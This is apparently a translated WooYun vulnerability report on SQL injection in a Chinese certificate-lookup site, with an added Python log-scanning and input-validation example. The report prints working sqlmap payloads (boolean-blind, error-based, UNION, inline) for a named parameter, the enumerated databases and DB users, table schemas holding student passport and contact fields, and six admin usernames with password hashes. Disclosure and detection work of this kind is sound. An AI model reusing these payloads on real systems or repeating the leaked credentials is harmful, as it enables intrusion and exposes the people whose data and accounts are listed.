
Vulnerability summary

Defect ID: wooyun-2015-0140792

Title: 中国证书查询网 (China Certificate Query Network) SQL injection vulnerability (leaks a large amount of important information)

Affected vendor: 中国证书查询网

Author: 路人甲

Submitted: 2015-09-15 09:37

Fix time: 2015-11-01 15:34

Published: 2015-11-01 15:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 14

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-15: Details sent to the vendor; awaiting vendor handling
2015-09-17: CNCERT (National Internet Emergency Center) has not yet been able to contact the relevant organization; details disclosed only to the reporting body
2015-09-27: Details disclosed to core white hats and experts in related fields
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public

Brief description:

SQL injection in 中国证书查询网, leaking a large amount of important information...

Detailed description:

Through the injection vulnerability, a large amount of important information can be dumped from the site, including the administrator account and password; the password could not be cracked, however, so no further testing was possible...
Injection point: http://**.**.**.**/online_join.asp?cid=1
As many as 16 databases...

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
Payload: cid=(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 8709*(SELECT 8709 FROM master..sysdatabases) END))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cid=1 AND 4384=CONVERT(INT,(CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) (SELECT (CASE WHEN (4384=4384) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: cid=-3936 UNION ALL SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) CHAR(82) CHAR(65) CHAR(80) CHAR(78) CHAR(72) CHAR(116) CHAR(82) CHAR(85) CHAR(75) CHAR(78) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58),NULL--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: cid=(SELECT CHAR(58) CHAR(97) CHAR(99) CHAR(119) CHAR(58) (SELECT (CASE WHEN (7556=7556) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(100) CHAR(113) CHAR(58))
---
[20:13:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:13:49] [INFO] fetching database names
[20:13:50] [INFO] the SQL query used returns 16 entries
available databases [16]:
[*] 360beikao
[*] 86690003_201311
[*] 86690003_201411
[*] 86690003_com
[*] baodicanyin
[*] beixinyuan
[*] cnzscxdata
[*] cnzscxdata_2015
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] ShangHui
[*] tempdb
[*] xueyuan
current database: 'cnzscxdata'
current user: 'cnzscxdata_u'
7 users:
[20:15:29] [INFO] the SQL query used returns 7 entries
[20:15:29] [INFO] retrieved: "86690003_com"
[20:15:30] [INFO] retrieved: "baodicanyin"
[20:15:30] [INFO] retrieved: "BUILTIN\\\\Administrators"
[20:15:30] [INFO] retrieved: "cnzscxdata_u"
[20:15:31] [INFO] retrieved: "sa"
[20:15:31] [INFO] retrieved: "shanghui"
[20:15:32] [INFO] retrieved: "SUPERNIC-56FF19\\\\SQLDEBUGGER"
database management system users [7]:
[*] 86690003_com
[*] baodicanyin
[*] BUILTIN\\Administrators
[*] cnzscxdata_u
[*] sa
[*] shanghui
[*] SUPERNIC-56FF19\\SQLDEBUGGER
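The sqlmap output above shows four probe styles (boolean-based blind, error-based with CONVERT, UNION and inline queries) sent through the numeric cid parameter of online_join.asp, which evidently accepted anything. The following Python is an added example, not part of the original report or the site's code: it reads IIS-style W3C access-log lines, flags requests whose cid is not a plain integer or that carry the MSSQL probe patterns seen in this report, and includes the allow-list check such an endpoint should apply before the value reaches the query. The log lines, field layout (date, time, method, URI stem, query, client IP, status) and client addresses are constructed for the example and are assumptions, not the real server's configuration.

```python
"""Flag MSSQL injection probes in IIS W3C access logs and validate a numeric id.

Added example. Log lines and field layout are constructed; they assume the
fields  date time cs-method cs-uri-stem cs-uri-query c-ip sc-status  and that
the query string is logged URL-encoded (no raw spaces), as IIS does.
"""
import re
from urllib.parse import parse_qs, unquote

# Detection rules keyed on what the sqlmap run in the report actually sent.
# Each (label, pattern) is applied to the URL-decoded query string.
RULES = [
    ("boolean-blind", re.compile(r"\bCASE\s+WHEN\b.*\bTHEN\b", re.I | re.S)),
    ("error-based",   re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("union",         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    # Three or more CHAR(n) literals chained together (string smuggling).
    ("char-encoding", re.compile(r"(?:CHAR\s*\(\s*\d+\s*\)\s*[+ ]?\s*){3,}", re.I)),
    ("catalog-probe", re.compile(r"\b(master\.\.sysdatabases|sysobjects|syscolumns)\b", re.I)),
]

# Constructed sample log (IP addresses from documentation ranges).
LOG_SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-09-14 20:13:40 GET /online_join.asp cid=1 203.0.113.7 200
2015-09-14 20:13:41 GET /online_join.asp cid=1%20AND%204384%3DCONVERT(INT%2C(CHAR(58)%2BCHAR(97)%2BCHAR(99)%2BCHAR(119)%2BCHAR(58))) 203.0.113.7 500
2015-09-14 20:13:42 GET /online_join.asp cid=-3936%20UNION%20ALL%20SELECT%20CHAR(58)%2BCHAR(97)%2BCHAR(99)%2CNULL-- 203.0.113.7 200
2015-09-14 20:13:43 GET /online_join.asp cid=(SELECT%20(CASE%20WHEN%20(8709%3D8709)%20THEN%201%20ELSE%208709*(SELECT%208709%20FROM%20master..sysdatabases)%20END)) 203.0.113.7 200
2015-09-14 20:13:44 GET /index.asp - 198.51.100.9 200
"""


def is_valid_cid(raw):
    """Allow-list check for a record id: digits only, no sign, no whitespace,
    at most 9 digits so the value always fits a 32-bit INT column."""
    return raw is not None and re.fullmatch(r"[0-9]{1,9}", raw) is not None


def classify_query(query):
    """Return the rule labels matched by one raw cs-uri-query value.
    A cid that fails the allow-list check is reported first."""
    decoded = unquote(query)
    labels = [label for label, pat in RULES if pat.search(decoded)]
    cid = parse_qs(query, keep_blank_values=True).get("cid", [None])[0]
    if cid is not None and not is_valid_cid(cid):
        labels.insert(0, "non-numeric-cid")
    return labels


def parse_line(line):
    """Split one W3C log line into the assumed field layout; skip directives."""
    fields = line.split()
    if len(fields) < 7 or fields[0].startswith("#"):
        return None
    return {"date": fields[0], "time": fields[1], "method": fields[2],
            "stem": fields[3], "query": fields[4], "client": fields[5],
            "status": fields[6]}


def scan_log(lines):
    """Return one finding per log line that trips at least one rule."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        labels = classify_query(rec["query"])
        if labels:
            findings.append({"time": rec["time"], "client": rec["client"],
                             "stem": rec["stem"], "labels": labels})
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_SAMPLE.splitlines()):
        print(f["time"], f["client"], f["stem"], ",".join(f["labels"]))
```

The non-numeric-cid rule is the one that matters most for the endpoint itself: every payload in the report fails it, and rejecting the request (or rewriting the query to use a parameterized command) at that point removes the injection regardless of which probe style follows. The pattern rules are for log review and alerting; the error-based probes in particular stand out because they also produce HTTP 500 responses, as in the constructed second line.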

Screenshots: 1.png, 2.png, 3.png, 4.png, 5.png

Proof of vulnerability:

The database contains a large amount of sensitive student information...

Database: cnzscxdata
[34 tables]
+---------------------------+
| dtproperties |
| icetu_Admin |
| icetu_Advertisement |
| icetu_Cert |
| icetu_CertSample |
| icetu_City |
| icetu_College |
| icetu_Number |
| icetu_Province |
| icetu_RecruitStudentsInfo |
| icetu_UserMessage |
| icetu_activeText |
| icetu_adChannal |
| icetu_join |
| icetu_manager |
| icetu_news |
| icetu_regUser |
| icetu_renzheng |
| kk358_Admin |
| kk358_Agencies |
| kk358_Application |
| kk358_ApplicationOrders |
| kk358_Courses |
| kk358_Messages |
| kk358_MigrationClients |
| kk358_News |
| kk358_RegisteredCourses |
| kk358_Schedule |
| kk358_Schools |
| kk358_StayHomes |
| kk358_Students |
| kk358_Travel |
| sysconstraints |
| syssegments |
+---------------------------+
Database: cnzscxdata
Table: icetu_Admin
[7 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| CurrentLoginIP | nvarchar |
| CurrentLoginTime | smalldatetime |
| Flag | nvarchar |
| LastLoginIP | nvarchar |
|
| PassWord | nvarchar |
| UserName | nvarchar |
+------------------+---------------+
Database: cnzscxdata
Table: kk358_Students
[20 columns]
+-----------------+---------------+
| Column | Type |
+-----------------+---------------+
| AgentId | int |
| AreaId | int |
| AsscNo | nvarchar |
| BirthDay | smalldatetime |
| ContactPersonId | int |
| ContactPhone | nvarchar |
| CreateDate | smalldatetime |
| CreateUser | nvarchar |
| CurrentUser | nvarchar |
| Email | nvarchar |
| ExpireDate | smalldatetime |
| FullName | nvarchar |
| GraduationDate | nvarchar |
| id | int |
| LastUpdateDate | smalldatetime |
| LastUpdateUser | nvarchar |
| Mobile | nvarchar |
| PassportNo | nvarchar |
| Telephone | nvarchar |
| VisaType | nvarchar |
+-----------------+---------------+
Database: cnzscxdata
Table: kk358_Admin
[12 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| AreaId | nvarchar |
| BrowseFlag | int |
| CurrentLoginIP | nvarchar |
| CurrentLoginTime | smalldatetime |
| Flag | nvarchar |
| ID | int |
| LastLoginIP | nvarchar |
| LastLoginTime | smalldatetime |
| Options | nvarchar |
| PassWord | nvarchar |
| UserGroup | tinyint |
| UserName | nvarchar |
+------------------+---------------+
Database: cnzscxdata
Table: kk358_Admin
[6 entries]
+------------+------------------+-----------+
| UserName | PassWord | UserGroup |
+------------+------------------+-----------+
| accountant | 21e09df36d23bf1c | 3 |
| admin | 3144d570f6b2bf3b | 0 |
| newuser | 42b452ccbe28c89e | 0 |
| OMSyd | a9921913b1d203b0 | 2 |
| GMSyd | b94e3172b87abc2b | 1 |
| officer | cbf64331dddd69eb | 4 |
+------------+------------------+-----------+
Screenshots: 5.png, 6.png, 7.png
Fix recommendation:

That's about it...

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-17 15:32

Vendor reply:


CNVD confirmed and reproduced the described situation, and has notified the site operator by email through its public contact channel.

Latest status:

None yet